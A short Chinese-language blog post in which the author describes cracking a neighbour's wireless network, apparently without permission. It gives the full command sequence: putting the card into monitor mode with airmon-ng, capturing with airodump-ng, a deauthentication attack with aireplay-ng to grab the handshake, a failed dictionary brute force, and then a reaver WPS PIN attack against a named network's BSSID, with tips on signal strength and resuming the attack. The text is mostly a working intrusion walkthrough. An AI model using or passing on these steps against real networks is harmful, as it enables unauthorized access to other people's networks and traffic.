筆者住處附近有無線信號,覺得可以試着破解一下,於是有了如下實踐。
軟硬件環境:Vmware Workstation 9,BT5 r3,reaver1.4,無線網卡LINKSYS WUSB54GC
BT5下進行如下命令:ifconfig -a 查找無線網卡
ifconfig wlan0 up 激活無線網卡
airmon-ng start wlan0 設置無線網卡模式爲監控
ifconfig -a 出現mon0
下面就是查看無線網絡信息,也就是抓包:airodump-ng mon0,見下圖
筆者試着用aireplay-ng對mon0進行Deauth***獲取handshake包,成功了,但是利用密碼字典進行暴力破擊未成功,運氣不好,密碼設置的有些複雜。於是,改用reaver進行破解pin的實踐。使用PIN方法破解WPA-PSK密碼有一個限制,就是AP必須開啓了QSS、WPS功能。上圖中,MB列下,有‘.’代表開啓了QSS或WPS。PWR應該要大於-75。
reaver命令很簡單,爲破解‘kay’的網絡,輸入命令:reaver -i mon0 -b F4:EC:38:48:9F:BE -v,見下圖
中間出現重複的time out,因爲reaver可以自動保存進度,所以果斷中斷,然後重試,見下圖:
-vv參數可以顯示更多信息,也可以加入-S參數。最後,成功破解,見下圖:
